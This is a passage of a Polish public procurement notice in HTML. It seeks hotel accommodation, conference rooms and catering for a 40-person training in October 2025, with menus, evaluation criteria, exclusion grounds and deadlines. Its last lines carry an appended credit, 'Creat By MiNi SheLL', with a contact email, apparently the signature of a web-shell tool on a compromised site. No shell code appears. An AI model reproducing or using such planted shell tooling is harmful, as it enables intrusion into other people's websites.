ujęta w ofercie. Doba hotelowa rozpoczyna się w dniu przyjazdu najpóźniej <br/>o godzinie 14:00, w razie przyjazdów przed godziną zarezerwowanych pokoi, uzależnione będzie od dostępności wolnych pokoi. Doba hotelowa kończy się w dniu wyjazdu w przedziale godzinowym najwcześniej o godzinie 11:00, a przedłużenie pobytu będzie możliwe, pod warunkiem dostępności wolnych pokoi. Wykonawca wymaga, aby Zamawiający w dniach 27 - 28 października 2025r. (jedna doba hotelowa) zapewnił nocleg dla 40 osób w 18 pokojach dwuosobowych i 4 w pokojach jednoosobowych. W zakresie zapewnienia usług konferencyjnych: Pierwszego dnia w godzinach 10:00 - 13:00 Wykonawca zapewni dostęp do jednej sali konferencyjnej zdolnej pomieścić do 42 osób. Pierwszego dnia pomiędzy godziną 14:00 a 18:00 Wykonawca zapewni dostęp do dwóch sal konferencyjnych, z których każda zdolna będzie pomieścić do 21 osób. Drugiego dnia pomiędzy godziną 09:00 a 13:00 Wykonawca zapewni dostęp do dwóch sal konferencyjnych, z których każda będzie zdolna pomieścić do 21 osób. Sala konferencyjna musi być wyposażona w co najmniej wentylację mechaniczną. Sala konferencyjna powinna posiadać sieć Wi-Fi, stanowisko z rzutnikiem multimedialnym, ekranem przeznaczonym do rzutnika multimedialnego. Sala powinna mieć nagłośnienie i być wyposażona w dwa mikrofony i flipchart, a także posiadać możliwość zaciemnienia. Ponadto Wykonawca powinien zapewnić osobę do obsługi technicznej oraz akustycznej dostępną w trakcie szkoleń oraz przynajmniej na jedną godzinę przed rozpoczęciem szkoleń. Wykonawca zapewni osobom przebywającym na salach konferencyjnych bezpieczeństwo w zakresie w jakim wymagają tego przepisy BHP. Sale konferencyjne powinny być dostępne na wyłączność dla celów szkolenia. W zakresie zapewnienia usług gastronomicznych: Zapewnienie wyżywienia dla wszystkich zgłoszonych uczestników oraz wykładowców (niekorzystających z zakwaterowania). Wykonawca zapewni na potrzeby wyżywienia uczestników szkolenia odpowiednią ilość stołów i krzeseł oraz odpowiednie przygotowanie sal i stołów cateringowych, obsługę kelnerską, a także usługę sprzątania. Wyżywienie dla 42 osób pierwszego dnia i dla 40 osób drugiego dnia (możliwość otrzymania posiłku wegetariańskiego, bez glutenu, <br/>bez laktozy). Wykonawca dołączy propozycje menu. W zakresie wyżywienia uczestników szkolenia Wykonawca zapewni: Dzień pierwszy: a) przerwa kawowa ciągła - kawa z ekspresu ciśnieniowego samoobsługowego, herbata minimum 2 rodzaje, soki owocowe minimum 2 rodzaje, woda niegazowana z cytryną podawana w dzbankach, woda gazowana butelkowana, dodatki - cukier, mleko do kawy, cytryna, ciasta domowe minimum 2 rodzaje;<br/>b) lunch w formie bufetu: Zupa - minimum 250 ml na osobę; <br/>Bufet gorący – minimum 1 x danie mięsne co najmniej 200 gram na osobę; 1 x danie rybne co najmniej 200 gram na osobę oraz 1 x danie wegetariańskie co najmniej 200 gram na osobę; co najmniej dwa dodatki do dań głównych w postaci ziemniaków, frytek, klusek śląskich itp. w ilości co najmniej 250 gram na osobę, zestaw surówek i jarzyn w ilości co najmniej 150 gram dla każdego uczestnika. c) kolacja uroczysta w formie bufetu z oprawą muzyczną (od godziny 19:00 do godziny 1:00): W jednej sali dla wszystkich uczestników szkolenia w formie bufetu, na którą będą się składać: <br/>Przystawki – minimum 2 x mięsna, 2 x wegetariańska i 1 x rybna oraz dodatki takie jak pieczywo minimum 2 rodzaje i bufet sałatkowy minimum 3 rodzaje;<br/>Bufet gorący – minimum 2 x danie mięsne, 1 x danie rybne oraz 2 x danie wegetariańskie, warzywa oraz dodatki takie jak ryż, ziemniaki itp.;<br/>Napoje - kawa z ekspresu ciśnieniowego samoobsługowego, herbata minimum 3 rodzaje, soki owocowe minimum 2 rodzaje, woda niegazowana z cytryną, woda gazowana butelkowana.<br/>Dzień drugi: <br/>a) śniadanie w formie bufetu, zawierające również propozycje wegetariańskie;<br/>b) przerwa kawowa jednorazowa - kawa z ekspresu ciśnieniowego samoobsługowego, herbata minimum 2 rodzaje, soki owocowe minimum 2 rodzaje, woda niegazowana z cytryną podawana <br/>w dzbankach, woda gazowana butelkowana, dodatki - cukier, mleko do kawy, cytryna, ciasta domowe minimum 2 rodzaje<br/>c) lunch w formie bufetu:<br/>Zupa - minimum 250 ml na osobę; <br/>Bufet gorący – minimum 1 x danie mięsne co najmniej 200 gram na osobę; 1 x danie rybne <br/>co najmniej 200 gram na osobę oraz 1 x danie wegetariańskie co najmniej 200 gram na osobę; <br/>co najmniej dwa dodatki do dań głównych w postaci ziemniaków, frytek, klusek śląskich itp. w ilości co najmniej 250gram na osobę; zestaw surówek i jarzyn w ilości co najmniej 150gram dla każdego uczestnika.<br/>Przy realizacji usługi Wykonawca zapewni:<br/>1)	Zachowanie zasad higieny i obowiązujących przepisów sanitarnych przy przygotowaniu posiłków i ich podawaniu.<br/>2)	Przygotowanie posiłków zgodnie z zasadami racjonalnego wyżywienia, urozmaiconych <br/>z pełnowartościowych, świeżych produktów z ważnymi terminami przydatności do spożycia.<br/>3)	Skierowania do realizacji usług objętych przedmiotem umowy osób, które posiadają należyte przygotowanie do wykonywania tego typu czynności, posiadające stosowną wiedzę, kwalifikacje, doświadczenie oraz wymagane przepisami prawa badania.<br/>4)	Zagospodarowanie na własny koszt odpadów, w sposób zgodny z warunkami określonymi<br/>w ustawie z dnia 14 grudnia 2012 r. o odpadach (tj. Dz. U. z 2022r., poz. 699).<br/>Zachowanie zasad higieny i obowiązujących przepisów sanitarnych przy przygotowaniu posiłków<br/>i ich podawaniu.<br/>5)	Przestrzegania w trakcie realizacji usług wchodzących w zakres przedmiotu umowy obowiązujących przepisów sanitarnych, w tym ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia. (tj. Dz.U. z 2020., poz. 2021 ze zm.).<br/>Ponadto: 1)	Wykonawca zobowiązany jest do ścisłej współpracy z Zamawiającym na każdym etapie realizacji przedsięwzięcia, Zamawiający i Wykonawca w umowie wskażą osoby do kontaktu, w tym zakresie.<br/>2)	Wykonawca jest zobowiązany do zachowania najwyższej staranności i działania zgodnie z obowiązującym stanem prawnym.<br/>3)	Wykonawca odpowiada za wszelkie zobowiązania formalno-prawne wobec podmiotów z nim współpracujących przy lub na rzecz realizacji niniejszego zamówienia. 4)	Wykonawca jest zobowiązany do niezwłocznego pisemnego informowania Zamawiającego o zaistnieniu sytuacji zagrażających niedotrzymaniu terminu lub sposobu realizacji przedmiotu zamówienia.<br/>5)	Ostateczna liczba uczestników zostanie podana najpóźniej na 7 dni roboczych przed rozpoczęciem zakwaterowania.<br/>6)	Wynagrodzenie Wykonawcy z tytułu realizacji zamówienia zależeć będzie od faktycznej ilości osób korzystających ze świadczonej usługi.<br/>7)	W przypadku anulowania lub zmniejszenia przez Zamawiającego zamówionych w niniejszej umowie usług w terminie do 7 dni przed planowanym przyjazdem, Zamawiający może dokonać bezkosztowej anulacji maksymalnie do 10% zamówionych usług. W takim wypadku proporcjonalnie pomniejszone zostanie wynagrodzenie Wykonawcy o którym mowa w § 6 pkt. 1, Umowy stanowiącej załącznik nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55120000-7 - Usługi hotelarskie w zakresie spotkań i konferencji</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55110000-4 - Hotelarskie usługi noclegowe</p> <p class="mb-0">55100000-1 - Usługi hotelarskie</p> <p class="mb-0">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Za najkorzystniejszą ofertę zostanie uznana oferta spełniająca wymagania SWZ oraz ustawy Pzp, która uzyska największą łączną liczbę punktów K = KC + KG + KB 2)	Kryteria oceny ofert obejmują:<br/>a) cena (KC) - 60%, co odpowiada 60 pkt.,<br/>b) (KG) – 20%, co odpowiada 20 pkt.<br/>c) budynek (KB) - 20%, co odpowiada 20 pkt.<br/>Zasady przyznawania punktów w poszczególnych kryteriach zostały opisane w ust. 3 - 5 niniejszego rozdziału SWZ. <br/>3)	Kryterium „cena” (KC) będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę na Formularzu Oferty wg poniższych zasad:<br/>KC = (CN/CB) × 60<br/>gdzie:<br/>KC - ilość punktów w kryterium cena,<br/>CB - cena oferty badanej,<br/>CN - najniższa cena spośród nieodrzuconych ofert,<br/>60 - waga kryterium.<br/><br/>Maksymalnie oferta Wykonawcy może uzyskać 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Elastyczne godziny dobry hotelowej dla uczestników szkolenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Budynek</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca do oferty dołącza oświadczenie o niepodleganiu wykluczeniu <br/>z postępowania, w zakresie wskazanym przez Zamawiającego. Oświadczenie to potwierdza brak podstaw wykluczenia z postępowania przez Wykonawcę na dzień składania ofert. Oświadczenie tymczasowo zastępuje wymagane przez Zamawiającego podmiotowe środki dowodowe. Wypełnione i podpisane przez Wykonawcę oświadczenie stanowi załącznik nr 3 do oferty. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie (załącznik nr 3 do oferty) składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia z postępowania. Wykonawca nie jest zobowiązany do złożenia dokumentów, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie wymaga złożenia podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) Wprowadzenie zmian treści umowy wymaga sporządzenia pod rygorem nieważności pisemnego aneksu. Zmiany te nie mogą naruszać postanowień art. 455 ustawy Pzp. 2) Zamawiający na mocy art. 455 ust. 1 pkt 1 dopuszcza możliwość zmiany zawartej umowy, w zakresie: a) zmian regulacji prawnych obowiązujących w dniu podpisania umowy; b) w przypadku urzędowej zmiany stawki VAT o kwoty wynikające ze zmian stawki podatku, c) w zakresie sposobu i realizacji zamówienia w przypadku, gdy konieczność ich wprowadzenia wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,<br/>d) nie stanowi zmiany umowy w rozumieniu art. 454 Prawa Zamówień Publicznych, zmiana danych związanych z obsługą administracyjno – organizacyjną Umowy (np.: zmiana numeru rachunku bankowego). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https:/ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-30 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-10-29</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com